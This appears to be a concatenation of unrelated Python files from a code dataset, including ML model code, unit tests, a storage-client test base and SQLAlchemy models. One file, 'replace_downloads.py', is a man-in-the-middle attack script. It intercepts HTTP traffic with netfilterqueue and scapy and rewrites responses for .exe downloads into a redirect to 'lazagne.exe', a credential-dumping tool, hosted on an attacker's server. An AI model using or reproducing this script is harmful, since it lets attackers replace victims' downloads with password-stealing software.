hoursLeftToday = END_HOUR - sla
sla -= hoursLeftToday
tomorrow = date.today() + timedelta(days=flag)
shiftTime = time(START_HOUR,0,0)
dt = datetime.combine(tomorrow, shiftTime, pytz.utc)
dt = adjust_Weekends_And_Holidays(dt) # adjust incase we hit a weekend
# now we find the office days and office hours
# we would need to complete the sla
days, hours = divmod(sla, workingHours)
dt += timedelta(hours=hours)
dt = adjust_Weekends_And_Holidays(dt, days=days) # adjust incase we hit a weekend
return dt
def isWeekend(dt):
"""Finds if a date lies on a weekend or not. Returns a boolean"""
if 0 < dt.weekday() < 6:
return False
else:
return True
def isHoliday(dt):
"""Finds if a date lies on a holiday or not. Returns a boolean"""
return Holiday.objects.filter(day=dt.date()).exists()
def adjust_Weekends_And_Holidays(dt, days=0):
"""
Adjust the datetime to a future datetime accomodating for
1. days needed
2. skipping Weekends
"""
while isWeekend(dt) or isHoliday(dt):
dt += timedelta(days=1)
while days:
dt += timedelta(days=1)
if isWeekend(dt) or isHoliday(dt):
continue
else:
days -= 1
return dt
| 2.890625 | 3 |
tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 7 | 11366 | <gh_stars>1-10
from hypothesis import given
from tests.port_tests.hints import (PortedBoundingBox,
PortedPoint)
from tests.utils import equivalence
from . import strategies
@given(strategies.points)
def test_basic(point: PortedPoint) -> None:
assert isinstance(point.bounding_box, PortedBoundingBox)
@given(strategies.points, strategies.points)
def test_bijection(first_point: PortedPoint,
second_point: PortedPoint) -> None:
assert equivalence(first_point == second_point,
first_point.bounding_box == second_point.bounding_box)
| 2.546875 | 3 |
test/conftest.py | alexandonian/lightning | 0 | 11367 | <reponame>alexandonian/lightning
import pytest
# import station
def pytest_addoption(parser):
parser.addoption("--engine", action="store", default="local",
help="engine to run tests with")
@pytest.fixture(scope='module')
def eng(request):
engine = request.config.getoption("--engine")
if engine == 'local':
return None
if engine == 'spark':
station.start(spark=True)
return station.engine()
| 2.140625 | 2 |
pytorch_translate/dual_learning/dual_learning_models.py | dzhulgakov/translate | 1 | 11368 | #!/usr/bin/env python3
import logging
import torch.nn as nn
from fairseq import checkpoint_utils
from fairseq.models import BaseFairseqModel, register_model
from pytorch_translate import rnn
from pytorch_translate.rnn import (
LSTMSequenceEncoder,
RNNDecoder,
RNNEncoder,
RNNModel,
base_architecture,
)
from pytorch_translate.tasks.pytorch_translate_task import PytorchTranslateTask
logger = logging.getLogger(__name__)
@register_model("dual_learning")
class DualLearningModel(BaseFairseqModel):
"""
An architecture to jointly train primal model and dual model by leveraging
distribution duality, which exist for both parallel data and monolingual
data.
"""
def __init__(self, args, task, primal_model, dual_model, lm_model=None):
super().__init__()
self.args = args
self.task_keys = ["primal", "dual"]
self.models = nn.ModuleDict(
{"primal": primal_model, "dual": dual_model, "lm": lm_model}
)
def forward(self, src_tokens, src_lengths, prev_output_tokens=None):
"""
If batch is monolingual, need to run beam decoding to generate
fake prev_output_tokens.
"""
# TODO: pass to dual model too
primal_encoder_out = self.models["primal"].encoder(src_tokens, src_lengths)
primal_decoder_out = self.models["primal"].decoder(
prev_output_tokens, primal_encoder_out
)
return primal_decoder_out
def max_positions(self):
return {
"primal_source": (
self.models["primal"].encoder.max_positions(),
self.models["primal"].decoder.max_positions(),
),
"dual_source": (
self.models["dual"].encoder.max_positions(),
self.models["dual"].decoder.max_positions(),
),
"primal_parallel": (
self.models["primal"].encoder.max_positions(),
self.models["primal"].decoder.max_positions(),
),
"dual_parallel": (
self.models["dual"].encoder.max_positions(),
self.models["dual"].decoder.max_positions(),
),
}
@register_model("dual_learning_rnn")
class RNNDualLearningModel(DualLearningModel):
"""Train two models for a task and its duality jointly.
This class uses RNN arch, but can be extended to take arch as an arument.
This class takes translation as a task, but the framework is intended
to be general enough to be applied to other tasks as well.
"""
def __init__(self, args, task, primal_model, dual_model, lm_model=None):
super().__init__(args, task, primal_model, dual_model, lm_model)
@staticmethod
def add_args(parser):
rnn.RNNModel.add_args(parser)
parser.add_argument(
"--unsupervised-dual",
default=False,
action="store_true",
help="Train with dual loss from monolingual data.",
)
parser.add_argument(
"--supervised-dual",
default=False,
action="store_true",
help="Train with dual loss from parallel data.",
)
@classmethod
def build_model(cls, args, task):
""" Build both the primal and dual models.
For simplicity, both models share the same arch, i.e. the same model
params would be used to initialize both models.
Support for different models/archs would be added in further iterations.
"""
base_architecture(args)
if args.sequence_lstm:
encoder_class = LSTMSequenceEncoder
else:
encoder_class = RNNEncoder
decoder_class = RNNDecoder
encoder_embed_tokens, decoder_embed_tokens = RNNModel.build_embed_tokens(
args, task.primal_src_dict, task.primal_tgt_dict
)
primal_encoder = encoder_class(
task.primal_src_dict,
embed_dim=args.encoder_embed_dim,
embed_tokens=encoder_embed_tokens,
cell_type=args.cell_type,
num_layers=args.encoder_layers,
hidden_dim=args.encoder_hidden_dim,
dropout_in=args.encoder_dropout_in,
dropout_out=args.encoder_dropout_out,
residual_level=args.residual_level,
bidirectional=bool(args.encoder_bidirectional),
)
primal_decoder = decoder_class(
src_dict=task.primal_src_dict,
dst_dict=task.primal_tgt_dict,
embed_tokens=decoder_embed_tokens,
vocab_reduction_params=args.vocab_reduction_params,
encoder_hidden_dim=args.encoder_hidden_dim,
embed_dim=args.decoder_embed_dim,
out_embed_dim=args.decoder_out_embed_dim,
cell_type=args.cell_type,
num_layers=args.decoder_layers,
hidden_dim=args.decoder_hidden_dim,
attention_type=args.attention_type,
dropout_in=args.decoder_dropout_in,
dropout_out=args.decoder_dropout_out,
residual_level=args.residual_level,
averaging_encoder=args.averaging_encoder,
)
primal_task = PytorchTranslateTask(
args, task.primal_src_dict, task.primal_tgt_dict
)
primal_model = rnn.RNNModel(primal_task, primal_encoder, primal_decoder)
if args.pretrained_forward_checkpoint:
pretrained_forward_state = checkpoint_utils.load_checkpoint_to_cpu(
args.pretrained_forward_checkpoint
)
primal_model.load_state_dict(pretrained_forward_state["model"], strict=True)
print(
f"Loaded pretrained primal model from {args.pretrained_forward_checkpoint}"
)
encoder_embed_tokens, decoder_embed_tokens = RNNModel.build_embed_tokens(
args, task.dual_src_dict, task.dual_tgt_dict
)
dual_encoder = encoder_class(
task.dual_src_dict,
embed_dim=args.encoder_embed_dim,
embed_tokens=encoder_embed_tokens,
cell_type=args.cell_type,
num_layers=args.encoder_layers,
hidden_dim=args.encoder_hidden_dim,
dropout_in=args.encoder_dropout_in,
dropout_out=args.encoder_dropout_out,
residual_level=args.residual_level,
bidirectional=bool(args.encoder_bidirectional),
)
dual_decoder = decoder_class(
src_dict=task.dual_src_dict,
dst_dict=task.dual_tgt_dict,
embed_tokens=decoder_embed_tokens,
vocab_reduction_params=args.vocab_reduction_params,
encoder_hidden_dim=args.encoder_hidden_dim,
embed_dim=args.decoder_embed_dim,
out_embed_dim=args.decoder_out_embed_dim,
cell_type=args.cell_type,
num_layers=args.decoder_layers,
hidden_dim=args.decoder_hidden_dim,
attention_type=args.attention_type,
dropout_in=args.decoder_dropout_in,
dropout_out=args.decoder_dropout_out,
residual_level=args.residual_level,
averaging_encoder=args.averaging_encoder,
)
dual_task = PytorchTranslateTask(args, task.dual_src_dict, task.dual_tgt_dict)
dual_model = rnn.RNNModel(dual_task, dual_encoder, dual_decoder)
if args.pretrained_backward_checkpoint:
pretrained_backward_state = checkpoint_utils.load_checkpoint_to_cpu(
args.pretrained_backward_checkpoint
)
dual_model.load_state_dict(pretrained_backward_state["model"], strict=True)
print(
f"Loaded pretrained dual model from {args.pretrained_backward_checkpoint}"
)
# TODO (T36875783): instantiate a langauge model
lm_model = None
return RNNDualLearningModel(args, task, primal_model, dual_model, lm_model)
| 2.421875 | 2 |
thgsp/sampling/__init__.py | qiuyy20/thgsp | 0 | 11369 | from ._utils import construct_dia, construct_hth, construct_sampling_matrix
from .bsgda import bsgda, computing_sets, recon_bsgda, solving_set_covering
from .ess import ess, ess_sampling, recon_ess
from .fastgsss import fastgsss, recon_fastssss
from .rsbs import cheby_coeff4ideal_band_pass, estimate_lk, recon_rsbs, rsbs
__all__ = [
"ess",
"ess_sampling",
"bsgda",
"computing_sets",
"solving_set_covering",
"cheby_coeff4ideal_band_pass",
"estimate_lk",
"rsbs",
"fastgsss",
# reconstruction
"recon_fastssss",
"recon_bsgda",
"recon_ess",
"recon_rsbs",
# utils
"construct_sampling_matrix",
"construct_hth",
"construct_dia",
]
| 1.140625 | 1 |
h2o-py/tests/testdir_generic_model/pyunit_generic_model_mojo_glm.py | vishalbelsare/h2o-3 | 1 | 11370 | <filename>h2o-py/tests/testdir_generic_model/pyunit_generic_model_mojo_glm.py
import tempfile
import os
import sys
sys.path.insert(1,"../../")
import h2o
from h2o.estimators import H2OGeneralizedLinearEstimator, H2OGenericEstimator
from tests import pyunit_utils
from tests.testdir_generic_model import compare_output, Capturing, compare_params
def test(x, y, output_test, strip_part, algo_name, generic_algo_name, family):
# GLM
airlines = h2o.import_file(path=pyunit_utils.locate("smalldata/testng/airlines_train.csv"))
glm = H2OGeneralizedLinearEstimator(nfolds = 2, family = family, max_iterations=2) # alpha = 1, lambda_ = 1, bad values, use default
glm.train(x = x, y = y, training_frame=airlines, validation_frame=airlines, )
print(glm)
with Capturing() as original_output:
glm.show()
original_model_filename = tempfile.mkdtemp()
original_model_filename = glm.download_mojo(original_model_filename)
generic_mojo_model_from_file = H2OGenericEstimator.from_file(original_model_filename)
assert generic_mojo_model_from_file is not None
print(generic_mojo_model_from_file)
compare_params(glm, generic_mojo_model_from_file)
with Capturing() as generic_output:
generic_mojo_model_from_file.show()
output_test(str(original_output), str(generic_output), strip_part, algo_name, generic_algo_name)
predictions = generic_mojo_model_from_file.predict(airlines)
assert predictions is not None
assert predictions.nrows == 24421
assert generic_mojo_model_from_file._model_json["output"]["model_summary"] is not None
assert len(generic_mojo_model_from_file._model_json["output"]["model_summary"]._cell_values) > 0
assert generic_mojo_model_from_file._model_json["output"]["variable_importances"] is not None
assert len(generic_mojo_model_from_file._model_json["output"]["variable_importances"]._cell_values) > 0
generic_mojo_filename = tempfile.mkdtemp("zip", "genericMojo");
generic_mojo_filename = generic_mojo_model_from_file.download_mojo(path=generic_mojo_filename)
assert os.path.getsize(generic_mojo_filename) == os.path.getsize(original_model_filename)
def mojo_model_test_binomial():
test(["Origin", "Dest"], "IsDepDelayed", compare_output, 'GLM Model: summary', 'ModelMetricsBinomialGLM: glm',
'ModelMetricsBinomialGLMGeneric: generic', 'binomial')
def mojo_model_test_regression():
test(["Origin", "Dest"], "Distance", compare_output, 'GLM Model: summary', 'ModelMetricsRegressionGLM: glm',
'ModelMetricsRegressionGLMGeneric: generic', 'gaussian')
def mojo_model_test_multinomial():
test(["Origin", "Distance"], "Dest", compare_output, 'GLM Model: summary', 'ModelMetricsMultinomialGLM: glm',
'ModelMetricsMultinomialGLMGeneric: generic', 'multinomial')
def mojo_model_test_ordinal():
test(["Origin", "Distance", "IsDepDelayed"], "fDayOfWeek", compare_output, 'GLM Model: summary',
'ModelMetricsOrdinalGLM: glm',
'ModelMetricsOrdinalGLMGeneric: generic', 'ordinal')
if __name__ == "__main__":
pyunit_utils.standalone_test(mojo_model_test_binomial)
pyunit_utils.standalone_test(mojo_model_test_multinomial)
pyunit_utils.standalone_test(mojo_model_test_regression)
pyunit_utils.standalone_test(mojo_model_test_ordinal)
else:
mojo_model_test_binomial()
mojo_model_test_multinomial()
mojo_model_test_regression()
mojo_model_test_ordinal()
| 2.328125 | 2 |
test/HPE3ParClient_base.py | jyotsnalothe/python-3parclient | 35 | 11371 | <filename>test/HPE3ParClient_base.py
# (c) Copyright 2015 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test base class of 3PAR Client."""
import os
import sys
import unittest
import subprocess
import time
import inspect
from pytest_testconfig import config
import datetime
from functools import wraps
from hpe3parclient import client, file_client
TIME = datetime.datetime.now().strftime('%H%M%S')
try:
# For Python 3.0 and later
from urllib.parse import urlparse
except ImportError:
# Fall back to Python 2's urllib2
from urlparse import urlparse
class HPE3ParClientBaseTestCase(unittest.TestCase):
user = config['TEST']['user']
password = config['<PASSWORD>']['<PASSWORD>']
flask_url = config['TEST']['flask_url']
url_3par = config['TEST']['3par_url']
debug = config['TEST']['debug'].lower() == 'true'
unitTest = config['TEST']['unit'].lower() == 'true'
port = None
remote_copy = config['TEST']['run_remote_copy'].lower() == 'true'
run_remote_copy = remote_copy and not unitTest
if run_remote_copy:
secondary_user = config['TEST_REMOTE_COPY']['user']
secondary_password = config['TEST_REMOTE_COPY']['pass']
secondary_url_3par = config['TEST_REMOTE_COPY']['3par_url']
secondary_target_name = config['TEST_REMOTE_COPY']['target_name']
ssh_port = None
if 'ssh_port' in config['TEST']:
ssh_port = int(config['TEST']['ssh_port'])
elif unitTest:
ssh_port = 2200
else:
ssh_port = 22
# Don't setup SSH unless needed. It slows things down.
withSSH = False
if 'domain' in config['TEST']:
DOMAIN = config['TEST']['domain']
else:
DOMAIN = 'UNIT_TEST_DOMAIN'
if 'cpg_ldlayout_ha' in config['TEST']:
CPG_LDLAYOUT_HA = int(config['TEST']['cpg_ldlayout_ha'])
if 'disk_type' in config['TEST']:
DISK_TYPE = int(config['TEST']['disk_type'])
CPG_OPTIONS = {'domain': DOMAIN,
'LDLayout': {'HA': CPG_LDLAYOUT_HA,
'diskPatterns': [{'diskType':
DISK_TYPE}]}}
else:
CPG_OPTIONS = {'domain': DOMAIN,
'LDLayout': {'HA': CPG_LDLAYOUT_HA}}
else:
CPG_LDLAYOUT_HA = None
CPG_OPTIONS = {'domain': DOMAIN}
if 'known_hosts_file' in config['TEST']:
known_hosts_file = config['TEST']['known_hosts_file']
else:
known_hosts_file = None
if 'missing_key_policy' in config['TEST']:
missing_key_policy = config['TEST']['missing_key_policy']
else:
missing_key_policy = None
def setUp(self, withSSH=False, withFilePersona=False):
self.withSSH = withSSH
self.withFilePersona = withFilePersona
cwd = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
if self.unitTest:
self.printHeader('Using flask ' + self.flask_url)
parsed_url = urlparse(self.flask_url)
userArg = '-user=%s' % self.user
passwordArg = <PASSWORD>' % self.password
portArg = '-port=%s' % parsed_url.port
script = 'HPE3ParMockServer_flask.py'
path = "%s/%s" % (cwd, script)
try:
self.mockServer = subprocess.Popen([sys.executable,
path,
userArg,
passwordArg,
portArg],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE
)
except Exception:
pass
time.sleep(1)
if self.withFilePersona:
self.cl = file_client.HPE3ParFilePersonaClient(self.flask_url)
else:
self.cl = client.HPE3ParClient(self.flask_url)
if self.withSSH:
self.printHeader('Using paramiko SSH server on port %s' %
self.ssh_port)
ssh_script = 'HPE3ParMockServer_ssh.py'
ssh_path = "%s/%s" % (cwd, ssh_script)
self.mockSshServer = subprocess.Popen([sys.executable,
ssh_path,
str(self.ssh_port)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
time.sleep(1)
else:
if withFilePersona:
self.printHeader('Using 3PAR %s with File Persona' %
self.url_3par)
self.cl = file_client.HPE3ParFilePersonaClient(self.url_3par)
else:
self.printHeader('Using 3PAR ' + self.url_3par)
self.cl = client.HPE3ParClient(self.url_3par)
if self.withSSH:
# This seems to slow down the test cases, so only use this when
# requested
if self.unitTest:
# The mock SSH server can be accessed at 0.0.0.0.
ip = '0.0.0.0'
else:
parsed_3par_url = urlparse(self.url_3par)
ip = parsed_3par_url.hostname.split(':').pop()
try:
# Now that we don't do keep-alive, the conn_timeout needs to
# be set high enough to avoid sometimes slow response in
# the File Persona tests.
self.cl.setSSHOptions(
ip,
self.user,
self.password,
port=self.ssh_port,
conn_timeout=500,
known_hosts_file=self.known_hosts_file,
missing_key_policy=self.missing_key_policy)
except Exception as ex:
print(ex)
self.fail("failed to start ssh client")
# Setup remote copy target
if self.run_remote_copy:
parsed_3par_url = urlparse(self.secondary_url_3par)
ip = parsed_3par_url.hostname.split(':').pop()
self.secondary_cl = client.HPE3ParClient(self.secondary_url_3par)
try:
self.secondary_cl.setSSHOptions(
ip,
self.secondary_user,
self.secondary_password,
port=self.ssh_port,
conn_timeout=500,
known_hosts_file=self.known_hosts_file,
missing_key_policy=self.missing_key_policy)
except Exception as ex:
print(ex)
self.fail("failed to start ssh client")
self.secondary_cl.login(self.secondary_user,
self.secondary_password)
if self.debug:
self.cl.debug_rest(True)
self.cl.login(self.user, self.password)
if not self.port:
ports = self.cl.getPorts()
ports = [p for p in ports['members']
if p['linkState'] == 4 and # Ready
('device' not in p or not p['device']) and
p['mode'] == self.cl.PORT_MODE_TARGET]
self.port = ports[0]['portPos']
def tearDown(self):
self.cl.logout()
if self.run_remote_copy:
self.secondary_cl.logout()
if self.unitTest:
self.mockServer.kill()
if self.withSSH:
self.mockSshServer.kill()
def print_header_and_footer(func):
"""Decorator to print header and footer for unit tests."""
@wraps(func)
def wrapper(*args, **kwargs):
test = args[0]
test.printHeader(unittest.TestCase.id(test))
result = func(*args, **kwargs)
test.printFooter(unittest.TestCase.id(test))
return result
return wrapper
def printHeader(self, name):
print("\n##Start testing '%s'" % name)
def printFooter(self, name):
print("##Completed testing '%s\n" % name)
def findInDict(self, dic, key, value):
for i in dic:
if key in i and i[key] == value:
return True
| 2.171875 | 2 |
test/drivers/second_quantization/hdf5d/test_driver_hdf5.py | jschuhmac/qiskit-nature | 0 | 11372 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Driver HDF5 """
import os
import pathlib
import shutil
import tempfile
import unittest
import warnings
from test import QiskitNatureTestCase
from test.drivers.second_quantization.test_driver import TestDriver
from qiskit_nature.drivers.second_quantization import HDF5Driver
from qiskit_nature.drivers import QMolecule
from qiskit_nature.properties.second_quantization.electronic import ElectronicStructureDriverResult
class TestDriverHDF5(QiskitNatureTestCase, TestDriver):
"""HDF5 Driver tests."""
def setUp(self):
super().setUp()
driver = HDF5Driver(
hdf5_input=self.get_resource_path(
"test_driver_hdf5.hdf5", "drivers/second_quantization/hdf5d"
)
)
self.driver_result = driver.run()
def test_convert(self):
"""Test the legacy-conversion method."""
legacy_file_path = self.get_resource_path(
"test_driver_hdf5_legacy.hdf5", "drivers/second_quantization/hdf5d"
)
with self.subTest("replace=True"):
# pylint: disable=consider-using-with
tmp_file = tempfile.NamedTemporaryFile(delete=False, suffix=".hdf5")
tmp_file.close()
os.unlink(tmp_file.name)
shutil.copy(legacy_file_path, tmp_file.name)
try:
driver = HDF5Driver(tmp_file.name)
# replacing file won't trigger deprecation on run
driver.convert(replace=True)
driver.run()
finally:
os.unlink(tmp_file.name)
msg_mol_ref = (
"The HDF5Driver.run with legacy HDF5 file method is deprecated as of version 0.4.0 "
"and will be removed no sooner than 3 months after the release "
". Your HDF5 file contains the legacy QMolecule object! You should "
"consider converting it to the new property framework. See also HDF5Driver.convert."
)
with self.subTest("replace=False"):
# pylint: disable=consider-using-with
tmp_file = tempfile.NamedTemporaryFile(delete=False, suffix=".hdf5")
tmp_file.close()
new_file_name = pathlib.Path(tmp_file.name).with_name(
str(pathlib.Path(tmp_file.name).stem) + "_new.hdf5"
)
os.unlink(tmp_file.name)
shutil.copy(legacy_file_path, tmp_file.name)
try:
driver = HDF5Driver(tmp_file.name)
# not replacing file will trigger deprecation on run
driver.convert(replace=False)
with warnings.catch_warnings(record=True) as c_m:
warnings.simplefilter("always")
driver.run()
self.assertEqual(str(c_m[0].message), msg_mol_ref)
# using new file won't trigger deprecation
HDF5Driver(new_file_name).run()
finally:
os.unlink(tmp_file.name)
os.unlink(new_file_name)
class TestDriverHDF5Legacy(QiskitNatureTestCase, TestDriver):
"""HDF5 Driver legacy file-support tests."""
def setUp(self):
super().setUp()
hdf5_file = self.get_resource_path(
"test_driver_hdf5_legacy.hdf5", "drivers/second_quantization/hdf5d"
)
# Using QMolecule directly here to avoid the deprecation on HDF5Driver.run method
# to be triggered and let it be handled on the method test_convert
# Those deprecation messages are shown only once and this one could prevent
# the test_convert one to show if called first.
molecule = QMolecule(hdf5_file)
molecule.load()
warnings.filterwarnings("ignore", category=DeprecationWarning)
self.driver_result = ElectronicStructureDriverResult.from_legacy_driver_result(molecule)
warnings.filterwarnings("default", category=DeprecationWarning)
if __name__ == "__main__":
unittest.main()
| 2.21875 | 2 |
01_test_pytorch.py | yokaji/dcase2021_task2_baseline_ae | 0 | 11373 | <gh_stars>0
########################################################################
# import default libraries
########################################################################
import os
import csv
import sys
import gc
########################################################################
########################################################################
# import additional libraries
########################################################################
import numpy as np
import scipy.stats
import torch
import torch.nn as nn
# from import
from tqdm import tqdm
from sklearn import metrics
try:
from sklearn.externals import joblib
except:
import joblib
# original lib
import common as com
from pytorch_model import AutoEncoder
########################################################################
########################################################################
# load parameter.yaml
########################################################################
param = com.yaml_load()
#######################################################################
########################################################################
# output csv file
########################################################################
def save_csv(save_file_path,
save_data):
with open(save_file_path, "w", newline="") as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerows(save_data)
########################################################################
########################################################################
# main 01_test.py
########################################################################
if __name__ == "__main__":
####################################################################
# set device
####################################################################
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device : {}".format(device))
####################################################################
# check mode
# "development": mode == True
# "evaluation": mode == False
mode = com.command_line_chk()
if mode is None:
sys.exit(-1)
# make output result directory
os.makedirs(param["result_directory"], exist_ok=True)
# load base directory
dirs = com.select_dirs(param=param, mode=mode)
# initialize lines in csv for AUC and pAUC
csv_lines = []
if mode:
performance_over_all = []
# loop of the base directory
for idx, target_dir in enumerate(dirs):
print("\n===========================")
print("[{idx}/{total}] {target_dir}".format(target_dir=target_dir, idx=idx+1, total=len(dirs)))
machine_type = os.path.split(target_dir)[1]
print("============== MODEL LOAD ==============")
# load model file
model_file = "{model}/model_{machine_type}.hdf5".format(model=param["model_directory"],
machine_type=machine_type)
if not os.path.exists(model_file):
com.logger.error("{} model not found ".format(machine_type))
sys.exit(-1)
input_channel = param["feature"]["n_mels"] * param["feature"]["n_frames"]
model = AutoEncoder(input_channel).to(device)
model.eval()
if device.type == "cuda":
model.load_state_dict(torch.load(model_file))
elif device.type == "cpu":
model.load_state_dict(torch.load(model_file, map_location=torch.device("cpu")))
# load anomaly score distribution for determining threshold
score_distr_file_path = "{model}/score_distr_{machine_type}.pkl".format(model=param["model_directory"],
machine_type=machine_type)
shape_hat, loc_hat, scale_hat = joblib.load(score_distr_file_path)
# determine threshold for decision
decision_threshold = scipy.stats.gamma.ppf(q=param["decision_threshold"], a=shape_hat, loc=loc_hat, scale=scale_hat)
if mode:
# results for each machine type
csv_lines.append([machine_type])
csv_lines.append(["section", "domain", "AUC", "pAUC", "precision", "recall", "F1 score"])
performance = []
dir_names = ["source_test", "target_test"]
for dir_name in dir_names:
#list machine id
section_names = com.get_section_names(target_dir, dir_name=dir_name)
for section_name in section_names:
# load test file
files, y_true = com.file_list_generator(target_dir=target_dir,
section_name=section_name,
dir_name=dir_name,
mode=mode)
# setup anomaly score file path
anomaly_score_csv = "{result}/anomaly_score_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"],
machine_type=machine_type,
section_name=section_name,
dir_name=dir_name)
anomaly_score_list = []
# setup decision result file path
decision_result_csv = "{result}/decision_result_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"],
machine_type=machine_type,
section_name=section_name,
dir_name=dir_name)
decision_result_list = []
print("\n============== BEGIN TEST FOR A SECTION ==============")
y_pred = [0. for k in files]
for file_idx, file_path in tqdm(enumerate(files), total=len(files)):
try:
data = com.file_to_vectors(file_path,
n_mels=param["feature"]["n_mels"],
n_frames=param["feature"]["n_frames"],
n_fft=param["feature"]["n_fft"],
hop_length=param["feature"]["hop_length"],
power=param["feature"]["power"])
except:
com.logger.error("File broken!!: {}".format(file_path))
data = torch.tensor(data, dtype=torch.float32).to(device)
reconst = model(data)
mseloss = nn.functional.mse_loss(data.detach(), reconst.detach())
y_pred[file_idx] = mseloss.item()
# store anomaly scores
anomaly_score_list.append([os.path.basename(file_path), y_pred[file_idx]])
# store decision results
if y_pred[file_idx] > decision_threshold:
decision_result_list.append([os.path.basename(file_path), 1])
else:
decision_result_list.append([os.path.basename(file_path), 0])
# output anomaly scores
save_csv(save_file_path=anomaly_score_csv, save_data=anomaly_score_list)
com.logger.info("anomaly score result -> {}".format(anomaly_score_csv))
# output decision results
save_csv(save_file_path=decision_result_csv, save_data=decision_result_list)
com.logger.info("decision result -> {}".format(decision_result_csv))
if mode:
# append AUC and pAUC to lists
auc = metrics.roc_auc_score(y_true, y_pred)
p_auc = metrics.roc_auc_score(y_true, y_pred, max_fpr=param["max_fpr"])
tn, fp, fn, tp = metrics.confusion_matrix(y_true, [1 if x > decision_threshold else 0 for x in y_pred]).ravel()
prec = tp / np.maximum(tp + fp, sys.float_info.epsilon)
recall = tp / np.maximum(tp + fn, sys.float_info.epsilon)
f1 = 2.0 * prec * recall / np.maximum(prec + recall, sys.float_info.epsilon)
csv_lines.append([section_name.split("_", 1)[1], dir_name.split("_", 1)[0], auc, p_auc, prec, recall, f1])
performance.append([auc, p_auc, prec, recall, f1])
performance_over_all.append([auc, p_auc, prec, recall, f1])
com.logger.info("AUC : {}".format(auc))
com.logger.info("pAUC : {}".format(p_auc))
com.logger.info("precision : {}".format(prec))
com.logger.info("recall : {}".format(recall))
com.logger.info("F1 score : {}".format(f1))
print("\n============ END OF TEST FOR A SECTION ============")
if mode:
# calculate averages for AUCs and pAUCs
amean_performance = np.mean(np.array(performance, dtype=float), axis=0)
csv_lines.append(["arithmetic mean", ""] + list(amean_performance))
hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance, dtype=float), sys.float_info.epsilon), axis=0)
csv_lines.append(["harmonic mean", ""] + list(hmean_performance))
csv_lines.append([])
del data
del model
if mode:
csv_lines.append(["", "", "AUC", "pAUC", "precision", "recall", "F1 score"])
# calculate averages for AUCs and pAUCs
amean_performance = np.mean(np.array(performance_over_all, dtype=float), axis=0)
csv_lines.append(["arithmetic mean over all machine types, sections, and domains", ""] + list(amean_performance))
hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance_over_all, dtype=float), sys.float_info.epsilon), axis=0)
csv_lines.append(["harmonic mean over all machine types, sections, and domains", ""] + list(hmean_performance))
csv_lines.append([])
# output results
result_path = "{result}/{file_name}".format(result=param["result_directory"], file_name=param["result_file"])
com.logger.info("results -> {}".format(result_path))
save_csv(save_file_path=result_path, save_data=csv_lines)
| 1.8125 | 2 |
Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 0 | 11374 | <gh_stars>0
#!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
ack_list = []
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will be using in line 22/29.
Do not forget to modify line 24 and 35 and uncomment them afterwards."""
scapy_packet = scapy.IP (packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
# print("HTTP Request")
if ".exe" in scapy_packet[scapy.Raw].load and #Input IP of your web server here: "10.0.2.15" not in scapy_packet[scapy.Raw].load:
print("Captured .exe file in the Request packet.")
ack_list.append(scapy_packet[scapy.TCP].ack)
# print(scapy_packet.show())
elif scapy_packet[scapy.TCP].sport ==#CHOOSE PORT HERE: 80 / 10000:
# print("HTTP Response")
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("Replacing the file.")
# print(scapy_packet.show())
modified_packet = set_load(scapy_packet, #Input the full path of your executable here: "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.15/Evil%20Files/lazagne.exe\n\n")
packet.set_payload(str(modified_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| 2.90625 | 3 |
tmpmodels.py | firaan1/iamgrateful | 0 | 11375 | <reponame>firaan1/iamgrateful
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
from sqlalchemy import Column, Integer, String, Text, ForeignKey, DateTime, func, Boolean
from sqlalchemy.orm import relation, sessionmaker, relationship, backref
from datetime import datetime
import os
# Database
DATABASE = 'sqlite:///db.sqlite3'
DEBUG = True
# ORM
Base = declarative_base()
# model
class User(Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True, autoincrement=True)
passcode = Column(Integer, nullable=False)
question = Column(String)
answer = Column(String)
def __init__(self, passcode):
self.passcode = passcode
def __repr__(self):
return '<User %s>' % {self.id}
class Memory(Base):
__tablename__ = 'memory'
id = Column(Integer, primary_key=True, autoincrement=True)
happiness = Column(Integer)
date = Column(DateTime, default = datetime.now())
things = relationship('Thing', secondary = 'memory_thing_link')
def __repr__(self):
return '<Memory %s>' % {self.date}
class Thing(Base):
__tablename__ = 'thing'
id = Column(Integer, primary_key=True, autoincrement=True)
text = Column(Text)
def __repr__(self):
return '<Item %s>' % {self.text}
class MemoryThingLink(Base):
